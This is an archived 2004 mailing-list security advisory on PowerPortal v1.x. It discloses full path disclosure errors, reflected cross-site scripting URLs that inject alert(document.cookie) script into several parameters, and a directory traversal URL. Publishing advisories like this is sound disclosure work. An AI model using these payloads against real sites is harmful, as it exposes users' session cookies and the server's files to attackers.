lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1088432814.25803.199314979@webmail.messagingengine.com>
From: darkbicho at fastmail.fm (DarkBicho)
Subject: Multiple vulnerabilities PowerPortal

http://www.swp-zone.org/archivos/advisory-07.txt

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PowerPortal :.: 

  PROGRAM: PowerPortal
  HOMEPAGE: http://powerportal.sourceforge.net/
  VERSION: v1.x
  BUG: Multiple vulnerabilities
  DATE:  23/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Email: darkbicho@...u.com

-------------------------------------------------------------------------------------------------

1.- Affected software description:
    ------------------------------

    PowerPortal is a popular content management system, written in php


2.- Vulnerabilities:
    ---------------


 A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.
    
    :.: Examples:

    * http://attacker/modules/gallery/resize.php

    <br />
    <b>Warning</b>:  imagecreatetruecolor(): Invalid image dimensions in
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>18</b><br />
    <br />
    <b>Warning</b>:  imagecopyresized(): supplied argument is not a
    valid Image resource in          
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>20</b><br />
    <br />
    <b>Warning</b>:  imagejpeg(): supplied argument is not a valid Image
    resource in            
    <b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
    <b>23</b><br />


    * http://attacker/power/modules.php?name=gallery&files=darkbicho

    Warning:    
    opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
    failed to open dir: Invalid argument in
    c:\appserv\www\power\modules\gallery\index.php on 
    line 99


 B. Cross-Site Scripting aka XSS:


http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(document.cookie);</script>
http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>



  C. Arbitrary directory browsing:


    * http://attacker/modules.php?name=gallery&files=/../../../


3.- SOLUTION:
     ????????
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon. 
    Check the PowerPortal website for updates and official release
    details. 


4.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D 
    "EL PISCO ES Y SERA PERUANO"


5.- Contact
    -------

	WEB: http://www.darkbicho.tk
	EMAIL: darkbicho@...u.com


-------------------------------------------------------------------------------------------------
                                ___________      ____________ 
                               /   _____/  \    /  \______   \   
                               \_____  \\   \/\/   /|     ___/      
                              /        \\        / |    |        
                             /_______  / \__/\  /  |____|       
                             \/      \/        
                       
                                Security Wari Projects 
                                  (c) 2002 - 2004
		                    Made in Peru

----------------------------------------[   EOF  
]----------------------------------------------
?
??
??
DarkBicho  
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ